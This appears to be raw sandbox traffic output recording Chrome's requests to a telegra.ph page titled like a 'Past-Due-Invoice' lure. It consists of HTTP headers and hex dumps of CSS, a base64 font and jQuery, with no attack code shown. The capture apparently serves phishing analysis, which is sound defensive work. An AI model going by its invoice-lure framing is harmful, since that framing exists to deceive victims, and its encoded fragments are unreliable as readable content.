                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC21INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 43 75 73 74 6f 6d 53 61 6e 73 53 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 73 72 63 3a 75 72 6c 28 64 61 74 61 3a 66 6f 6e 74 2f 6f 70 65 6e 74 79 70 65 3b 62 61 73 65 36 34 2c 64 30 39 47 52 6b 39 55 56 45 38 41 41 47 37 59 41 41 73 41 41 41 41 41 76 74 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 44 52 6b 59 67 41 41 41 4b 59 41 41 41 50 75 77 41 41 45 77 6b 42 78 43 78 7a 55 64 51 54 31 4d 41 41 45 6c 4d 41 41 41 6a 30 41 41 41 58 61 44 55 4c 73 45 6e 52 31 4e 56 51 67 41 41 62 52 77 41 41 41 47 36 41 41 41 44 63 44 4c 47 4c 52 39 50 55 79 38 79 41 41 41 46
                                                                                                                                                                                                                            Data Ascii: @font-face{font-family:CustomSansSerif;font-style:normal;font-weight:300;src:url(data:font/opentype;base64,d09GRk9UVE8AAG7YAAsAAAAAvtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDRkYgAAAKYAAAPuwAAEwkBxCxzUdQT1MAAElMAAAj0AAAXaDULsEnR1NVQgAAbRwAAAG6AAADcDLGLR9PUy8yAAAF
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC37INData Raw: 6c 6a 2f 6d 38 72 36 77 66 77 70 39 70 75 6e 72 38 6f 4c 53 6e 67 4e 6c 53 74 2f 58 30 32 51 6d 38 50 61 48 46 56 6c 43 39 67 48 38 68 72 36 44 6a 64 61 48 32 35 33 6c 6b 45 64 77 62 6b 6f 59 5a 65 51 47 2f 6d 5a 43 45 76 33 6b 64 75 47 6c 51 4c 68 53 54 33 2f 51 6e 42 64 71 64 4f 75 79 67 42 62 39 64 38 31 54 48 6c 32 70 44 50 76 6e 62 53 49 63 5a 32 50 42 50 74 47 35 6d 42 49 7a 42 79 6f 62 67 4a 41 78 4f 34 4b 76 69 65 4c 67 30 45 43 39 6d 38 78 70 36 71 42 48 4e 42 35 4f 64 6b 44 55 67 69 4d 34 77 46 6b 64 6b 6b 7a 52 65 54 6d 7a 72 58 76 76 46 4d 68 4d 4f 33 39 4a 38 48 4d 31 6e 67 4a 70 2b 63 52 39 4f 70 65 59 4f 4b 4f 67 6e 76 36 31 56 6a 53 55 5a 55 4c 2b 4d 34 41 70 76 48 56 68 6f 78 52 2f 51 74 4f 6d 77 4f 6e 2b 43 4e 6d 59 36 62 4b 38 46 66 31
                                                                                                                                                                                                                            Data Ascii: lj/m8r6wfwp9punr8oLSngNlSt/X02Qm8PaHFVlC9gH8hr6DjdaH253lkEdwbkoYZeQG/mZCEv3kduGlQLhST3/QnBdqdOuygBb9d81THl2pDPvnbSIcZ2PBPtG5mBIzByobgJAxO4KvieLg0EC9m8xp6qBHNB5OdkDUgiM4wFkdkkzReTmzrXvvFMhMO39J8HM1ngJp+cR9OpeYOKOgnv61VjSUZUL+M4ApvHVhoxR/QtOmwOn+CNmY6bK8Ff1
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC92INData Raw: 69 75 44 62 48 39 75 72 6b 2b 42 64 56 58 32 6d 62 56 6d 4a 66 6f 70 33 66 37 65 39 5a 2b 78 6b 59 79 2b 33 46 51 54 30 4d 4e 4c 6e 69 47 49 76 6c 6b 76 72 46 73 30 74 48 32 7a 4d 45 7a 45 75 78 4e 30 4f 42 71 33 6c 47 61 6f 50 72 5a 79 2f 75 47 73 49 5a 36 52 33 69 4e 61 37 4d 57 73 5a 69 48 77 32 2f 6e 5a 57 5a 38 54 37 49 64 32 4a 50 78 54 4d 6a 4c 78 37 37 37 31 2b 6a 70 39 43 51 57 43 53 6c 34 6b 68 71 4f 66 52 57 37 79 48 74 35 78 6d 70 71 6d 51 63 34 76 69 7a 72 6b 33 4b 62 30 68 61 71 33 57 74 30 6d 4a 64 65 2b 4a 7a 65 6b 42 76 73 61 70 77 68 74 34 2f 72 75 51 79 31 6f 6b 33 4f 56 38 46 74 66 4c 77 74 44 71 45 35 62 6b 37 56 62 48 38 62 36 4a 58 52 4d 54 61 65 4f 63 42 65 67 69 31 63 5a 61 37 69 68 6a 54 34 38 7a 39 62 30 45 4d 68 53 34 35 50 77
                                                                                                                                                                                                                            Data Ascii: iuDbH9urk+BdVX2mbVmJfop3f7e9Z+xkYy+3FQT0MNLniGIvlkvrFs0tH2zMEzEuxN0OBq3lGaoPrZy/uGsIZ6R3iNa7MWsZiHw2/nZWZ8T7Id2JPxTMjLx7771+jp9CQWCSl4khqOfRW7yHt5xmpqmQc4vizrk3Kb0haq3Wt0mJde+JzekBvsapwht4/ruQy1ok3OV8FtfLwtDqE5bk7VbH8b6JXRMTaeOcBegi1cZa7ihjT48z9b0EMhS45Pw
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC108INData Raw: 57 74 4f 67 45 47 2f 70 53 6d 44 72 75 75 62 6a 43 6d 75 72 75 34 75 37 79 43 74 2b 51 64 58 4d 72 48 42 4f 62 76 53 52 66 67 45 39 49 43 44 55 57 43 6b 68 4d 46 32 54 39 44 55 79 4d 6e 50 63 34 50 36 78 6e 53 71 72 65 31 59 38 78 58 56 32 53 4d 52 43 31 47 46 30 30 6d 7a 6f 31 46 50 35 48 61 41 4b 52 6e 51 51 68 6a 32 43 46 53 2f 7a 62 77 30 65 37 2b 34 6d 2f 6d 36 73 75 2f 4d 44 38 6f 58 43 36 2f 6a 66 79 59 75 43 59 34 4d 55 6c 2b 63 52 6c 55 33 64 6c 57 64 56 6c 31 73 69 66 46 79 57 65 49 33 50 6b 65 30 59 6d 44 59 72 74 76 52 38 35 51 4c 6c 77 64 5a 65 49 62 76 79 38 39 55 4a 78 68 52 4f 77 35 30 62 37 6d 71 34 74 37 41 64 36 44 6d 55 51 31 6a 51 66 33 6d 4c 77 74 70 4e 6f 35 6b 73 45 2f 6a 52 4e 6b 77 59 50 41 37 44 2f 4f 68 67 4e 71 4e 75 38 66 54
                                                                                                                                                                                                                            Data Ascii: WtOgEG/pSmDruubjCmuru4u7yCt+QdXMrHBObvSRfgE9ICDUWCkhMF2T9DUyMnPc4P6xnSqre1Y8xXV2SMRC1GF00mzo1FP5HaAKRnQQhj2CFS/zbw0e7+4m/m6su/MD8oXC6/jfyYuCY4MUl+cRlU3dlWdVl1sifFyWeI3Pke0YmDYrtvR85QLlwdZeIbvy89UJxhROw50b7mq4t7Ad6DmUQ1jQf3mLwtpNo5ksE/jRNkwYPA7D/OhgNqNu8fT
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC140INData Raw: 6e 54 4a 50 6e 63 35 35 4d 6c 2f 32 75 50 2b 6c 72 77 62 39 64 64 33 41 4c 66 33 74 4b 72 55 6e 6e 5a 4c 42 64 6e 50 48 49 38 30 6b 31 47 4f 52 35 76 4a 47 4d 61 36 39 33 50 4f 4a 37 76 33 46 4b 59 79 6a 65 6e 4d 6f 4a 69 5a 72 6e 2b 4e 31 33 6d 44 4e 33 6d 4c 64 2f 6a 51 6d 4a 38 77 69 39 6e 4d 59 53 37 7a 6d 4d 2b 2f 75 34 2f 39 38 2f 65 73 63 4b 39 4b 75 76 55 66 37 32 4e 73 5a 67 74 62 32 57 62 4f 4f 39 68 70 58 72 75 63 37 35 5a 37 35 46 36 35 54 2b 34 33 56 72 4b 50 79 57 51 66 6b 38 6b 2b 4a 76 2f 4c 66 55 79 66 45 6b 6f 35 7a 58 2f 30 66 6c 63 64 56 36 69 67 57 31 45 74 37 75 49 2b 6b 6e 31 4b 4a 76 75 55 54 50 59 70 6d 65 78 54 38 69 45 65 6f 5a 48 56 30 59 52 6d 4e 43 63 39 72 6f 70 61 30 70 70 32 2b 6d 62 77 47 42 33 6f 52 42 65 36 65 59 2f 71
                                                                                                                                                                                                                            Data Ascii: nTJPnc55Ml/2uP+lrwb9dd3ALf3tKrUnnZLBdnPHI80k1GOR5vJGMa693POJ7v3FKYyjenMoJiZrn+N13mDN3mLd/jQmJ8wi9nMYS7zmM+/u4/98/escK9KuvUf72NsZgtb2WbOO9hpXruc75Z75F65T+43VrKPyWQfk8k+Jv/LfUyfEko5zX/0flcdV6igW1Et7uI+kn1KJvuUTPYpmexT8iEeoZHV0YRmNCc9ropa0pp2+mbwGB3oRBe6eY/q
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC157INData Raw: 34 33 43 53 72 78 48 47 45 2b 6f 38 63 52 37 43 6f 73 64 66 53 47 53 76 68 6d 30 69 4d 34 2b 59 51 4f 71 45 62 76 6b 31 55 71 56 6c 5a 71 57 6e 4e 57 52 61 4c 79 57 53 78 5a 44 57 6e 4b 56 68 38 69 39 44 73 54 6c 49 4c 42 73 66 51 55 69 33 4a 51 33 54 71 4c 30 2b 6f 36 67 50 4e 43 66 5a 4b 6e 7a 4b 52 34 41 58 74 47 62 58 36 4f 6a 37 4f 6e 47 65 32 71 65 2b 64 50 2f 6e 43 61 74 36 57 64 31 44 65 6c 37 50 50 48 5a 79 6c 62 33 50 37 66 64 5a 55 68 55 72 73 6a 58 63 38 47 5a 35 6a 69 36 43 71 56 63 71 58 4d 5a 57 6c 35 68 7a 65 75 72 34 75 55 36 4f 65 46 78 4c 68 46 70 6c 55 61 55 79 51 43 2b 6f 4c 4b 51 54 34 43 49 4c 76 45 49 72 65 75 2f 43 56 4a 38 48 69 4c 4d 4a 77 65 31 66 53 56 35 4c 5a 73 4c 75 79 56 7a 6d 38 46 59 37 58 6d 58 35 66 72 34 51 54 44 2f
                                                                                                                                                                                                                            Data Ascii: 43CSrxHGE+o8cR7CosdfSGSvhm0iM4+YQOqEbvk1UqVlZqWnNWRaLyWSxZDWnKVh8i9DsTlILBsfQUi3JQ3TqL0+o6gPNCfZKnzKR4AXtGbX6Oj7OnGe2qe+dP/nCat6Wd1Del7PPHZylb3P7fdZUhUrsjXc8GZ5ji6CqVcqXMZWl5hzeur4uU6OeFxLhFplUaUyQC+oLKQT4CILvEIreu/CVJ8HiLMJwe1fSV5LZsLuyVzm8FY7XmX5fr4QTD/
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC234INData Raw: 38 62 44 4e 6c 38 7a 46 4d 34 70 36 76 6f 33 6c 55 4f 68 45 6b 6d 70 4d 35 6c 4f 4e 4d 43 65 61 37 73 36 31 44 39 44 49 65 76 76 46 6e 54 50 69 6e 30 72 4d 35 48 6f 36 34 38 56 71 59 52 36 6f 6c 59 6f 79 56 45 6e 55 46 4b 2f 45 79 6d 61 4f 48 35 51 6f 4a 62 69 56 4c 2f 73 30 30 68 4f 73 47 50 41 37 69 6e 6d 6d 73 38 6d 59 78 67 35 6a 31 34 51 78 70 34 44 52 4e 62 38 4f 39 57 52 30 43 63 4a 61 34 69 46 77 66 71 4d 37 63 54 6a 41 55 65 50 4c 6f 4f 61 58 59 7a 70 6f 63 4a 6f 6f 74 65 41 66 51 4c 6a 6c 70 6d 52 52 61 4e 6a 4b 77 42 69 78 7a 79 7a 31 4b 71 43 48 59 46 73 42 59 5a 4b 49 4f 72 6f 5a 74 65 47 43 53 43 4d 32 6f 30 38 48 67 49 6e 43 67 50 4e 47 55 72 73 6f 38 4b 35 6d 38 68 35 6a 78 6b 71 70 79 53 76 79 59 53 53 74 33 4c 61 46 6b 63 63 31 7a 78 43
                                                                                                                                                                                                                            Data Ascii: 8bDNl8zFM4p6vo3lUOhEkmpM5lONMCea7s61D9DIevvFnTPin0rM5Ho648VqYR6olYoyVEnUFK/EymaOH5QoJbiVL/s00hOsGPA7inmms8mYxg5j14Qxp4DRNb8O9WR0CcJa4iFwfqM7cTjAUePLoOaXYzpocJooteAfQLjlpmRRaNjKwBixzyz1KqCHYFsBYZKIOroZteGCSCM2o08HgInCgPNGUrso8K5m8h5jxkqpySvyYSSt3LaFkcc1zxC
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC250INData Raw: 49 53 45 49 68 32 57 75 4a 78 2b 4b 57 43 58 35 44 6f 32 42 30 4b 5a 41 59 45 38 72 64 63 52 6c 74 58 72 46 63 4d 72 6f 2b 48 55 68 53 31 59 4e 4e 62 76 54 4c 5a 48 43 7a 6b 69 7a 54 53 4a 39 45 52 6e 6c 78 35 7a 34 43 45 58 67 50 62 70 49 61 64 6d 52 6b 79 57 53 74 61 55 4c 4a 32 73 33 4a 46 4e 6c 6b 74 57 31 75 6a 2f 36 75 50 33 4c 35 77 50 64 59 53 69 72 6a 66 42 35 67 64 38 67 63 79 44 2b 32 7a 44 43 32 52 56 77 47 48 4d 33 42 70 31 4c 71 49 70 74 71 76 36 77 63 61 4b 65 68 4c 53 47 6c 32 62 77 57 68 34 71 6a 64 43 42 67 38 74 6e 31 4c 45 53 43 76 52 79 6a 44 31 43 76 5a 74 5a 37 79 51 38 32 44 57 46 46 72 48 53 75 45 33 78 4c 4d 68 7a 79 5a 6c 62 4a 68 33 6f 34 63 4e 55 31 39 53 32 6d 56 6d 75 36 53 56 63 50 5a 6c 71 72 74 36 45 50 59 71 4a 31 31 54
                                                                                                                                                                                                                            Data Ascii: ISEIh2WuJx+KWCX5Do2B0KZAYE8rdcRltXrFcMro+HUhS1YNNbvTLZHCzkizTSJ9ERnlx5z4CEXgPbpIadmRkyWStaULJ2s3JFNlktW1uj/6uP3L5wPdYSirjfB5gd8gcyD+2zDC2RVwGHM3Bp1LqIptqv6wcaKehLSGl2bwWh4qjdCBg8tn1LESCvRyjD1CvZtZ7yQ82DWFFrHSuE3xLMhzyZlbJh3o4cNU19S2mVmu6SVcPZlqrt6EPYqJ11T
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC266INData Raw: 6e 35 65 77 54 53 4e 67 77 2b 68 56 74 36 47 36 68 4d 35 57 6e 70 45 75 4e 47 32 73 75 36 4c 41 73 45 76 61 4a 4c 52 77 71 4b 48 5a 32 35 4a 42 37 31 62 62 62 33 64 59 34 4b 39 32 65 4e 4f 48 67 66 32 53 72 63 50 57 7a 2b 59 48 4b 6b 65 6d 57 41 33 6f 69 79 71 72 69 49 79 4e 43 51 79 52 43 62 6e 41 69 4a 6c 53 66 61 70 34 71 64 31 76 61 4d 6a 74 41 53 66 51 61 76 2b 38 77 6b 56 48 42 34 52 48 46 6f 6c 72 32 2b 6f 71 61 71 70 43 36 73 4f 35 76 4c 78 47 69 71 45 77 43 41 59 68 49 71 75 78 39 6c 6a 42 35 41 65 6c 78 59 64 4a 2f 57 75 6c 48 65 32 64 52 56 55 44 72 4e 4e 6f 6b 53 66 61 41 47 36 44 49 6b 72 72 4d 6a 4a 7a 4d 39 55 72 65 52 6c 64 45 53 31 6b 74 4d 54 45 69 4b 36 6b 32 53 41 76 77 66 78 56 6d 6e 68 6b 56 4b 66 6d 6f 6a 75 35 76 62 38 79 68 47 68
                                                                                                                                                                                                                            Data Ascii: n5ewTSNgw+hVt6G6hM5WnpEuNG2su6LAsEvaJLRwqKHZ25JB71bbb3dY4K92eNOHgf2SrcPWz+YHKkemWA3oiyqriIyNCQyRCbnAiJlSfap4qd1vaMjtASfQav+8wkVHB4RHFolr2+oqaqpC6sO5vLxGiqEwCAYhIqux9ljB5AelxYdJ/WulHe2dRVUDrNNokSfaAG6DIkrrMjJzM9UreRldES1ktMTEiK6k2SAvwfxVmnhkVKfmoju5vb8yhGh
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC282INData Raw: 67 46 42 79 77 4d 79 41 42 7a 78 42 6e 42 51 59 67 2f 4d 33 43 39 50 6a 66 62 34 59 54 7a 43 73 59 4f 52 51 59 47 43 61 44 35 42 69 66 4d 38 30 48 55 67 6f 4d 7a 41 44 78 54 51 79 56 65 41 46 4d 7a 4c 56 68 67 6d 45 41 68 73 48 6e 6b 37 69 37 70 34 6c 41 52 59 2f 55 2f 77 54 6f 49 4d 67 49 32 42 34 30 79 42 54 59 42 69 79 41 37 59 42 46 33 6b 68 33 31 51 48 58 35 68 67 44 41 41 51 67 47 30 34 49 5a 49 73 6e 4a 54 75 65 79 4d 6d 65 53 77 72 79 46 67 6d 71 38 6a 62 6e 39 4f 51 39 6a 68 6e 4a 2b 2f 2f 2b 41 32 36 59 79 49 64 66 64 68 69 2f 42 39 52 5a 79 6f 5a 6e 55 35 45 74 75 36 59 68 4f 32 4b 6d 49 33 76 43 5a 69 35 76 55 62 4a 6e 38 6a 61 76 74 69 4c 76 38 57 68 62 38 76 36 2f 2f 34 43 49 48 63 71 48 6e 39 35 55 52 68 32 37 6a 73 4e 41 62 44 35 6c 66 69
                                                                                                                                                                                                                            Data Ascii: gFBywMyABzxBnBQYg/M3C9Pjfb4YTzCsYORQYGCaD5BifM80HUgoMzADxTQyVeAFMzLVhgmEAhsHnk7i7p4lARY/U/wToIMgI2B40yBTYBiyA7YBF3kh31QHX5hgDAAQgG04IZIsnJTueyMmeSwryFgmq8jbn9OQ9jhnJ+//+A26YyIdfdhi/B9RZyoZnU5Etu6YhO2KmI3vCZi5vUbJn8javtiLv8Whb8v6//4CIHcqHn95URh27jsNAbD5lfi
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC298INData Raw: 57 75 5a 39 31 75 66 68 2b 6f 38 4a 4c 43 49 78 49 44 2b 56 52 62 78 39 62 6e 78 62 58 75 70 31 46 4d 2f 67 59 52 64 67 52 49 65 6f 78 57 59 58 35 57 51 56 38 61 34 34 51 6e 5a 33 76 47 79 48 34 4e 56 75 6c 70 47 64 6d 70 49 69 71 66 73 6e 50 53 4d 44 65 59 61 4f 70 62 44 2f 38 76 70 7a 56 72 58 6f 48 72 65 63 4c 4f 73 58 77 62 52 6c 57 32 51 6e 34 57 4b 35 46 53 2f 69 62 64 44 59 65 4e 70 6f 72 34 38 44 6c 4c 46 35 38 68 78 2f 4d 46 7a 42 33 2b 50 5a 49 39 56 54 53 33 56 6d 75 68 69 31 53 34 78 4a 57 6c 7a 46 38 37 35 33 66 34 70 79 52 45 4f 49 34 52 53 42 6f 4e 54 6c 7a 7a 67 69 45 77 2f 4f 46 36 57 67 32 41 6c 2f 62 43 5a 62 76 32 6b 38 73 59 58 45 78 57 6b 34 52 61 71 46 36 72 54 42 37 32 45 69 66 44 4c 42 51 47 6a 41 53 70 75 32 63 4c 42 43 30 6c 67
                                                                                                                                                                                                                            Data Ascii: WuZ91ufh+o8JLCIxID+VRbx9bnxbXup1FM/gYRdgRIeoxWYX5WQV8a44QnZ3vGyH4NVulpGdmpIiqfsnPSMDeYaOpbD/8vpzVrXoHrecLOsXwbRlW2Qn4WK5FS/ibdDYeNpor48DlLF58hx/MFzB3+PZI9VTS3Vmuhi1S4xJWlzF8753f4pyREOI4RSBoNTlzzgiEw/OF6Wg2Al/bCZbv2k8sYXExWk4RaqF6rTB72EifDLBQGjASpu2cLBC0lg
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC314INData Raw: 65 39 4d 50 7a 54 64 4c 52 37 77 51 37 57 75 70 76 62 61 4b 6c 74 52 31 42 42 74 52 52 58 52 41 4e 6a 31 63 68 37 76 79 48 2f 45 50 43 66 79 57 76 5a 57 63 7a 34 75 32 58 69 37 4f 58 72 48 41 53 4d 33 79 2f 4a 63 35 57 38 37 34 7a 50 78 63 63 62 65 65 64 52 37 4c 79 4e 79 6d 71 4d 61 6b 4a 50 6e 4f 69 66 71 51 30 36 75 67 79 44 4f 6c 6d 73 67 39 42 34 36 79 49 6c 36 45 65 79 74 6a 64 42 43 32 4b 67 68 4f 56 46 50 41 6f 5a 65 78 75 62 36 51 5a 4f 38 78 70 53 6f 77 6c 31 6f 48 33 73 46 2b 39 4e 58 31 42 30 68 66 48 6e 6f 4c 49 66 48 6f 71 37 6f 4a 4a 6f 46 75 66 35 79 45 74 78 7a 63 6d 30 47 31 68 30 31 72 41 50 71 32 77 66 6f 45 75 2b 61 54 36 41 35 79 32 4e 32 31 4b 32 6f 55 36 4a 72 76 46 30 57 30 4d 6a 4f 51 32 76 2b 67 67 70 52 6b 33 69 59 62 37 65 4c
                                                                                                                                                                                                                            Data Ascii: e9MPzTdLR7wQ7WupvbaKltR1BBtRRXRANj1ch7vyH/EPCfyWvZWcz4u2Xi7OXrHASM3y/Jc5W874zPxccbeedR7LyNymqMakJPnOifqQ06ugyDOlmsg9B46yIl6EeytjdBC2KghOVFPAoZexub6QZO8xpSowl1oH3sF+9NX1B0hfHnoLIfHoq7oJJoFuf5yEtxzcm0G1h01rAPq2wfoEu+aT6A5y2N21K2oU6JrvF0W0MjOQ2v+ggpRk3iYb7eL
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC330INData Raw: 4b 35 69 49 45 61 37 6a 63 6f 62 4c 73 68 46 77 2b 42 45 75 53 61 6a 51 4d 77 30 53 46 7a 7a 45 58 59 63 6b 65 53 6e 46 4e 69 4b 7a 4f 72 43 68 77 78 51 41 56 52 48 4d 67 49 62 69 53 64 4a 38 30 75 44 78 43 73 50 59 56 76 4a 43 34 68 47 62 64 51 33 4f 42 71 42 72 63 52 48 7a 44 32 33 51 65 4a 42 6f 6d 77 6b 6e 58 6d 6f 45 56 43 4d 35 42 6a 73 50 59 62 33 49 70 6b 68 38 65 6f 53 4a 69 48 2b 45 44 31 74 68 52 54 32 4d 46 68 72 47 32 6a 4e 57 43 47 31 58 6d 41 74 30 51 71 70 30 70 6f 7a 62 54 69 52 44 65 4b 2f 79 7a 69 52 54 62 2b 61 58 43 78 71 74 46 47 5a 6e 47 34 44 58 58 51 42 6e 57 72 4f 7a 61 68 6b 76 37 74 57 31 6e 47 4f 2f 33 4a 6b 38 4f 47 33 63 71 78 47 4e 4e 76 74 43 69 75 71 35 41 71 68 32 66 4d 51 62 46 49 64 59 79 37 69 53 79 69 7a 4b 6f 73 49
                                                                                                                                                                                                                            Data Ascii: K5iIEa7jcobLshFw+BEuSajQMw0SFzzEXYckeSnFNiKzOrChwxQAVRHMgIbiSdJ80uDxCsPYVvJC4hGbdQ3OBqBrcRHzD23QeJBomwknXmoEVCM5BjsPYb3Ipkh8eoSJiH+ED1thRT2MFhrG2jNWCG1XmAt0Qqp0pozbTiRDeK/yziRTb+aXCxqtFGZnG4DXXQBnWrOzahkv7tW1nGO/3Jk8OG3cqxGNNvtCiuq5Aqh2fMQbFIdYy7iSyizKosI
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC347INData Raw: 79 50 6b 4b 65 43 41 45 6d 70 64 41 34 33 38 50 31 66 67 52 44 6b 4f 7a 2f 44 50 56 4f 44 38 32 62 6e 45 50 2f 79 55 4d 56 65 4a 49 32 6e 77 48 6a 67 58 78 56 46 6b 38 46 66 7a 37 34 41 73 33 51 42 59 4c 30 79 76 79 64 6b 65 74 68 4f 67 7a 77 44 45 47 63 53 33 2b 64 4d 61 5a 73 52 32 77 62 2b 78 59 6e 73 43 36 34 2f 42 64 34 33 76 57 6b 72 77 62 65 70 78 4e 4a 6f 70 4d 30 79 45 42 53 77 30 45 52 61 5a 4b 45 74 4d 77 46 49 54 5a 35 6c 4a 73 4e 79 45 72 44 41 70 56 70 6f 30 71 30 79 47 31 53 62 4c 47 74 59 53 73 73 37 6b 57 57 38 4b 62 44 44 46 62 44 51 6c 62 44 4b 6c 62 44 5a 6c 62 44 45 70 74 70 6f 4b 74 70 6c 4b 74 70 73 71 64 70 68 71 54 70 73 55 5a 30 79 57 70 35 6d 41 70 35 73 55 7a 7a 49 42 7a 7a 5a 4a 6e 30 34 46 50 6d 33 45 46 30 32 55 4c 35 6b 59
                                                                                                                                                                                                                            Data Ascii: yPkKeCAEmpdA438P1fgRDkOz/DPVOD82bnEP/yUMVeJI2nwHjgXxVFk8Ffz74As3QBYL0yvydkethOgzwDEGcS3+dMaZsR2wb+xYnsC64/Bd43vWkrwbepxNJopM0yEBSw0ERaZKEtMwFITZ5lJsNyErDApVpo0q0yG1SbLGtYSss7kWW8KbDDFbDQlbDKlbDZlbDEptpoKtplKtpsqdphqTpsUZ0yWp5mAp5sUzzIBzzZJn04FPm3EF02UL5kY
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC363INData Raw: 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 63 6f 6c 6f 72 3a 23 37 39 38 32 38 42 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 32 31 70 78 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 2e 74 6c 5f 61 72 74 69 63 6c 65 20 2e 74 6c 5f 61 72 74 69 63 6c 65 5f 63 6f 6e 74 65 6e 74 20 66 69 67 63 61 70 74 69 6f 6e 20 2e 65 64 69 74 61 62 6c 65 5f 69 6e 70 75 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 0a 2e 74 6c 5f 61 72 74 69 63 6c 65 20 2e 74 6c 5f 61 72 74 69 63 6c 65 5f 63 6f 6e 74 65 6e 74 20 2e 66 69
                                                                                                                                                                                                                            Data Ascii: al,sans-serif;font-size:15px;color:#79828B;padding:12px 21px 0;line-height:18px;vertical-align:top;text-align:center}.tl_article .tl_article_content figcaption .editable_input{width:100%;border:none;padding:0;margin:0}.tl_article .tl_article_content .fi


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            6192.168.2.649856149.154.164.13443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC12OUTGET /js/jquery.min.js HTTP/1.1
                                                                                                                                                                                                                            Host: telegra.ph
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://telegra.ph/Past-Due-Invoice-05-13
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC60INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:44 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                            Content-Length: 95786
                                                                                                                                                                                                                            Last-Modified: Wed, 09 Nov 2016 17:39:54 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            ETag: "58235f6a-1762a"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC60INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 34 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e
                                                                                                                                                                                                                            Data Ascii: /*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a win
